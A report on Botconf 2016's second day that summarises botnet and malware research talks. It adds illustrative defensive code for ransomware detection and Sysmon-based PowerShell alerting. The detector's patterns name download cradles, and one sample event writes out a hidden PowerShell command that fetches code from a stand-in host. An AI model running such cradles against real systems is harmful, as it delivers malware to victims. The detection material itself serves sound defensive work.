Botconf 2016 – Day Two

DAY 2

Title: Ransomware & Beyond

Ransomware is now well known, but its numbers continue to grow. In this talk, Christiaan Beek shares his research and experience. He begins by explaining why ransomware is so widespread and how it can be deployed with only limited computer skills.

He then details the various techniques he used to study and counter ransomware, such as:

  • machine learning
  • static/dynamic analyses
  • memory analysis
  • etc.

He then presents "Ransomware Interceptor", a project aimed at stopping ransomware infections by detecting file encryption, and concludes with its possible future developments.
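As an added illustration (not code from the Ransomware Interceptor project, whose internals the talk does not detail), one heuristic a file-encryption detector can apply: a rewrite that turns a recognised document into header-less, near-random bytes, repeated by the same process a few times in a row, is treated as encryption in progress. The thresholds, the magic-byte list and the sample buffers are assumptions constructed for the example.

```python
import hashlib
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the buffer; 8.0 is the maximum, reached by uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

# Headers of common document types; an encrypted rewrite destroys them.
KNOWN_MAGIC = (b"%PDF", b"PK\x03\x04", b"\x89PNG", b"\xff\xd8\xff", b"\xd0\xcf\x11\xe0")

def has_known_header(data: bytes) -> bool:
    return any(data.startswith(m) for m in KNOWN_MAGIC)

def looks_encrypted(before: bytes, after: bytes, threshold: float = 7.5) -> bool:
    """A rewrite that turns a recognised file into header-less, near-random bytes."""
    return (has_known_header(before) and not has_known_header(after)
            and shannon_entropy(after) >= threshold)

class WriteMonitor:
    """Per-process streak of encrypted-looking rewrites; trips when it reaches `limit`.

    The streak resets on any benign-looking write so that a single legitimate
    archive or image save does not raise an alert. Limit and threshold are assumptions.
    """
    def __init__(self, limit: int = 3):
        self.limit = limit
        self.streak = {}

    def observe(self, pid: int, before: bytes, after: bytes) -> bool:
        """Record one file write by `pid`; return True when the process should be blocked."""
        self.streak[pid] = self.streak.get(pid, 0) + 1 if looks_encrypted(before, after) else 0
        return self.streak[pid] >= self.limit

# Constructed sample buffers: a low-entropy PDF-like file and a pseudo-random rewrite.
PLAIN_PDF = b"%PDF-1.4\n" + b"The quick brown fox jumps over the lazy dog. " * 100
CIPHERTEXT = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))

if __name__ == "__main__":
    mon = WriteMonitor(limit=3)
    for path in ("a.pdf", "b.pdf", "c.pdf"):
        print(path, "blocked" if mon.observe(4242, PLAIN_PDF, CIPHERTEXT) else "observed")
```

Entropy alone misfires on compressed archives and images, which is why the header check and the per-process streak are combined with it.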

 

Title: Attacking Linux/Moose 2.0 Unraveled an EGO MARKET

Linux/Moose is a worm targeting the IoT, particularly Linux systems with BusyBox. To track the activities of this worm, researchers at GoSecure, in partnership with ESET, set up several honeypots which were used to study the connections opened by the botnet.

Masarah Paquet-Clouston and Olivier Bilodeau from GoSecure demonstrate how the bot launches a Man-in-the-Middle (MITM) attack on HTTPS connections by mimicking a TLS inspection to target social media. They explain that the bot's goal is to remain as discreet as possible, avoiding direct victims to prevent attracting attention. The ultimate aim is to generate likes or followers on social media.

In conclusion, the speakers explain how they traced the botnet back to the site they believe to be the source of the social media stock purchases, but also that, despite their efforts, the authorities and hosting providers are not interested in this botnet due to a lack of 'direct victims'.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR08-MOOSE-BILODEAU-PAQUET-CLOUSTON.pdf

 

Title: Tracking Exploit Kits

John Bambenek from Fidelis Cybersecurity presents his method for tracking exploit kits. Indeed, exploit kits are one of the most widespread methods for distributing viruses, so monitoring them can greatly reduce infections.

John Bambenek's priorities are to ensure the detection of exploit kits in order to protect users, but also to develop intelligence for monitoring them.

Therefore, Fidelis Cybersecurity has deployed virtual machines vulnerable to specific exploit kits in order to track these kits based on the vulnerabilities they exploit. Combined with a web crawler (such as Bing's bot), this allows for the detection of malicious URLs.

In conclusion, John Bambenek's method makes it possible to monitor a large number of exploit kits, which he then links to malware families or hacker groups.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR09-Tracking-exploit-kits-Bambenek.pdf

 

Title: Improve DDoS Botnet Tracking With Honeypots

This talk by Ya Liu, a researcher at Qihoo 360, shows us how to track DDoS attacks originating from botnets in order to find out:

  • Who is being attacked?
  • Which botnet family is attacking?
  • Which Command & Control handles the attack?
  • What are the parameters of the attack?

The Qihoo 360 team began monitoring over 30 botnet families in 2014 and exposes their attack strategies using more than a dozen honeypots. To categorize these families, Ya Liu and his colleagues rely on a Packet Generation Algorithm (PGA) signature. Three attack types are supported: TCP SYN-ACK, DNS response attacks, and ICMP unreachable messages.

Qihoo 360 thus detected 2,333 SYN-ACK attacks and 1,835 DNS response attacks between August 2015 and October 2016.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR10-Improve-DDoS-Botnet-Tracking-With-Honeypots-LIU.pdf

 

Title: Function Identification and Recovery Signature Tool (FIRST)

At 12:30 Angel Villegas (Talos) presented "Function Identification and Recovery Signature Tool (FIRST)", an IDA plugin that facilitates the reverse engineering of unknown binaries.

The plugin's purpose is to store and centralize various information for a given set of opcodes (function name, comments, source, etc.) on a shared server. This allows users to retrieve metadata associated with all of the program's functions when analyzing a new program, provided they are present on the FIRST server. Talos has set up a public FIRST server, which they have populated by compiling numerous open-source projects. It is also possible to set up a private ("on-premise") FIRST server, as described in the documentation available here: http://first-plugin-ida.readthedocs.io/en/latest/.

The project's source code is available on GitHub: https://github.com/vrtadmin/FIRST-plugin-ida

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR11-Function-Identification-and-Recovery-Signature-Tool-Villegas.pdf

 

Title: Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk)

After a quick introduction to "sysmon", a tool from the Sysinternals suite, Tom Ueltschi presents his approach to improving detection on workstations.

The goal is to propose a method based on "sysmon" and Splunk to generate automated and customizable alerts in the event of workstation compromise. To generate these alerts, Tom Ueltschi created rules based on suspicious and unusual behavior.

He then presents rules for detecting the execution of PowerShell commands, such as those that download a file or use arguments that are not typical of ordinary program execution. Some detection rules are based on the actions of classic penetration testing tools, in order to detect the same behaviors when they are produced during this type of engagement.
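As an added example (not Tom Ueltschi's rules, which live in Splunk searches over Sysmon data), the following Python applies the same idea to Sysmon EventID 1 (process creation) records: PowerShell launches are matched against a few regexes for download cradles and unusual arguments, plus a parent-process check for Office applications. Field names follow Sysmon's schema (Image, ParentImage, CommandLine); the rule list and the sample events are constructed for the example.

```python
import re

# Each rule: (name, regex applied to the lowercased command line).
POWERSHELL_RULES = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient")),
    ("encoded command", re.compile(r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}")),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden")),
    ("no profile / non-interactive", re.compile(r"-nop\b|-noprofile\b|-noni\b|-noninteractive\b")),
]
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")  # rarely spawn shells

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()  # last component of a Windows path

def evaluate(event: dict) -> list:
    """Return the names of the rules a Sysmon EventID 1 (process creation) record triggers."""
    if event.get("EventID") != 1:
        return []
    if basename(event.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return []
    cmd = event.get("CommandLine", "").lower()
    hits = [name for name, rx in POWERSHELL_RULES if rx.search(cmd)]
    if basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        hits.append("office parent")
    return hits

def scan(events: list) -> list:
    """(process name, triggered rules) for every event that triggers at least one rule."""
    findings = []
    for e in events:
        hits = evaluate(e)
        if hits:
            findings.append((basename(e["Image"]), hits))
    return findings

# Constructed sample records (not real telemetry), shaped like Sysmon EventID 1 fields.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')\""},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": ""},
]
if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS):
        print(name, "->", ", ".join(hits))
```

The second sample (a scheduled inventory script launched from Explorer) triggers nothing, which is the point of keying on arguments and parent rather than on PowerShell itself.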

 

Title: How Does Dridex Hide Friends?

From 2:40 PM to 3:00 PM, Alexandra Toussaint (OpenMinded) and Sébastien Larinier (Sekoia) presented an investigation that took place following a fraudulent bank transfer of €800,000 from an account with multi-factor authentication. The investigation was conducted using a disk image of the infected machine. The identified files (VBS) allowed investigators to deduce that the malware was Dridex. However, other files unrelated to Dridex (notably a file named "j.bat" containing obfuscated PowerShell code) were also identified on the disk.

The presence of these files rules out the possibility of Dridex bots being resold to other actors who would have carried out the bank transfer via the RemoteUtilities remote administration tool.

 

Title: A Tete-a-Tete with RSA Bots

At 3 PM, Jens Frieß presented "A Tete-A-Tete with RSA Bots," a presentation focused on reverse engineering bots using asymmetric cryptography when communicating with the C&C server. His approach involves setting up a client-server architecture similar to that used by the botnet, but replacing the key pairs. The bot's public key is replaced by injecting a DLL that hooks the Windows APIs related to key and certificate management. Communication with the fake C&C server is made possible via DNS spoofing. His method has proven effective against Panda Banker (a Zeus clone) and URLZone. However, it does have some limitations:

  • Applies only to dynamic analysis.
  • Works only if the bot uses standard libraries and has no mechanism against DLL injection.
  • Requires knowledge of the structure of the messages exchanged between clients and the server.

 

Title: Takedown client-server botnets the ISP-way

After a short coffee break, Quảng Trần Minh from the Viettel Group presented "Takedown client-server botnets the ISP way," beginning by listing the strengths and capabilities available to an ISP to combat botnets (DNS, traffic control, DPI, etc.). The Viettel Group set up a dummy C&C server to which it redirects its users' traffic in the event of an infection. Several redirection methods were implemented:

  • Changing the DNS entry on the ISP's DNS server to point to the analysis server.
  • Modifying DNS queries/responses in cases where users do not use the ISP's DNS server.
  • Redirecting IP traffic directly, if the connection is made directly to an IP address.

Quảng Trần Minh explained the technical specifications of the server they implemented. It is based on a system of dispatchers and modules, which allow for the simulation of several different C&C servers on a single server, depending on the protocols used, message structure, etc.

The methods presented have proven effective against the Ramnit and Andromeda botnets, but can hardly be applied to bots that verify the identity of the C&C or that use an asymmetric encryption layer.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR15-Takedown-ISP-QUANG-TRAN-MINH.pdf

Title: Detecting the Behavioral Relationships of Malware Connections

Sebastian Garcia presents a method for detecting compromises that no longer relies on Indicators of Compromise (IOCs) but on virus behavior. He explains that IOCs are the best current detection method, but they are not sufficient.

Stratosphere IPS is open-source software based on virus 'intentions' coupled with machine learning. This IPS models virus behavior based on connections established with a set of destination IP addresses and ports, and the protocol used, in order to determine the behavior of each virus.

Although this IPS is still under development and generates false positives, Sebastian Garcia explains how to improve malware detection by using abnormal behaviors.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR16-Detecting-the-Behavioral-Relationships-of-Malware-Connections-GARCIA.pdf

 

Title: Analysis of free movies and series websites guided by user terms search

At 5:15 PM, Luis Alberto Benthin Sanguino presented a study demonstrating that websites offering free movies and series are among those that distribute the most malicious content. Indeed, free entertainment attracts numerous users worldwide and is therefore a prime attack vector for botnet operators. Luis Alberto's approach involved examining the top 20 results returned by the Google search engine for queries such as "free online movies" in various languages.

The automated queries are performed using Selenium scripts to simulate the behavior of a legitimate user. The various domain names and URLs scanned are sent to VirusTotal to assess the malicious nature of the content.

The results of his study show that searches conducted in German return the fewest malicious results, while searches conducted in Spanish return more of them.

Slides: https://www.botconf.eu/wp-content/uploads/2016/11/PR17-Analysis-of-Free-Movies-and-Series-Websites-Guided-by-Users-Search-Terms-BENTHIN.pdf

Lightning talks

The final slot of this second day was dedicated to lightning talks, with 11 presentations of 3 minutes each:

  • "Unprotect", an open source project that consists of installing virtual machine artifacts (DLLs, registry keys, etc.) on ordinary workstations in order to deceive malware that uses anti-virtualization mechanisms and so prevent infections. http://unprotect.tdgt.org/index.php/Unprotect_Project
  • Osiris, a Windows executable emulator/debugger that facilitates analysis by applying hooks via DLL injection. http://os-iris.sourceforge.net/
  • Feedback from Deutsche Telekom regarding attacks on the TR-069 protocol of certain routers.
  • The Botleg project, which concerns the legitimacy, legality, and regulation of attacks against botnets.
  • A thesis presentation concerning Android botnets.
  • sisyphe.io, a project similar to Shodan based on masscan, which allows you to obtain various information about an IP address.
  • "A little rant about the use of VirusTotal"
  • Analysis and evolution of the TrickBot botnet
  • Malboxes, an automation tool for creating virtual machines to facilitate malware analysis.
  • .NET malware analysis
  • Dridex tracking

Finally, the day ended with the social event, held at the Trinity Chapel.

 

Links to the reports from the other days: Day 1 & Day 3